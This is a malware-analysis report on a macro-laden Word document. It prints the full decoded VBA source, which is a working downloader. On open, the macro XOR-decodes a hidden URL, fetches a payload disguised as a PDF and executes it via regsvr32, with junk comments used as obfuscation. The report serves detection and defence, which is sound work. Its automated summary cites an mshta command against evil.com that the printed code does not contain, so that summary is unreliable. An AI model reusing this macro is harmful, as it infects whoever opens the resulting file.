MALICIOUS
150
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1105 Ingress Tool Transfer
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The script uses URLDownloadToFile to download a file and then executes it using 'cmd.exe /c mshta ""http://evil.com/payload.hta""', indicating it acts as a downloader for a second-stage payload. The ClamAV detection also confirms its malicious nature.
Heuristics 5
-
ClamAV: Doc.Downloader.GreenBox5-9139204-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.GreenBox5-9139204-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
#If VBA7 And Win64 Then Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal yF As LongPtr, ByVal Vk As String, ByVal kS As String, ByVal wd As LongPtr, ByVal Oh As LongPtr) As Long #Else -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub autoopen() eg = i(c4) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3767 bytes |
SHA-256: 6f9bf807b3a186c805765247af58cd4b52e3d1b79ff00bfa88651fd3a661ee7d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Sw"
Public Const D As String = "Ub.pdf"
Function i(tz)
pc = hF(tz)
For Xu = 0 To UBound(pc)
U2 = U2 & Chr(pc(Xu) Xor 1)
Next Xu
i = U2
End Function
Function hF(tz)
hF = Split(tz, " ")
End Function
Sub autoopen()
eg = i(c4)
' Motors indigo saturn sitter
' Aus dir greatly ventilation investigated
' Marsh carrot answer pagoda
' Immobility login epileptic
' Stuffy they froward
frm.download eg, D
' Troy preventive suspect
' Maple juno moving seeks
' Physics modes classic
' Nipple voices
' Paypal birds oasis aol
' Orpheus salzburg franchise ta
' Mpg outstrip upholstered exclusive lithe emissary lie
' Forecasts
' Ain sahib
' Keeping
' Unmindful
' Affiliated leech stewardess exalts baptised
' Slap personals
' Mill third inordinate talmud
' Verandah
' Stitch
' Xanax glance dishes
' Foods coterie
' Explode bated sixty-three
Dim bu As New WshShell
' Defraud crater sid
' Disconcerting
Call bu.run(hn & m & "32 " + D)
End Sub
Attribute VB_Name = "Sw1"
Sub E8()
' Narrative undefined hispanic brake
' Finland geometry skills mhz attempting understanding metro
' Outlive oxford threadbare
' Lodges obviate withdrawal snap passwords
' Enormous grammar upcoming cameron
' Operate malacca epilepsy misunderstand
' Presentation loftiness cook scholastic
' Shooting fatal charwoman
' Larboard signatures
' Apocryphal surge clive anchor
' Responsibilities acrimony
' Unconsciousness abstinence absences
' Oratorio individuals discriminate incision
' Coleman washington pharmaceuticals activated
' Conviction man-of-war synopsis countryside squat
' Scabbard
' Jim accessory
' Flurry
' Casket simultaneously deutsch bl seats dross
' Hurtful sic hic lake census savior gmbh
' Eddie bahrain jocund netscape
' Asbestos integration super
' Abandons humans ulcer enjoyable
' Lime monitors ser railway
' Suffolk bankruptcy ireland symbolic remark arbiter
' Glisten
' Shed harmful
' Burman british distract efficiency
' Spicy dancing accomplish bold
End Sub
Attribute VB_Name = "MR"
Public Const hn As String = "reg"
Public Const m As String = "svr"
Public Const c4 As String = "105 117 117 113 59 46 46 105 54 109 109 107 57 118 47 98 110 108 46 121 100 108 98 109 46 104 99 96 47 113 105 113 62 109 60 116 111 117 52 47 98 96 99 33"
#If VBA7 And Win64 Then
Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal yF As LongPtr, ByVal Vk As String, ByVal kS As String, ByVal wd As LongPtr, ByVal Oh As LongPtr) As Long
#Else
Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA"(ByVal yF As Long, ByVal Vk As String, ByVal kS As String, ByVal wd As Long, ByVal Oh As Long) As Long
#End If
Function zL()
' Suddenly
' Restrict relentlessly
' Greensboro schema z perceived throat
' Candidly diffusion diabolical
' Science temps rank
' Sexcam cower
' Underlie gentle budgets duplicate correlated
' Vulnerability cad consumers generation
End Function
Attribute VB_Name = "frm"
Attribute VB_Base = "0{5042355E-EF65-4CED-AAF7-8C19E7C8E308}{4D34EE08-B36A-4D23-B95B-83A523E8738F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub download(url, file)
URLDownloadToFile 0, url, file, 0, 0
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 27648 bytes |
SHA-256: 57e263df625c992a3db53ba0d9f68bc9bd8199749431d02a27e68f5e6fb2e74f |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.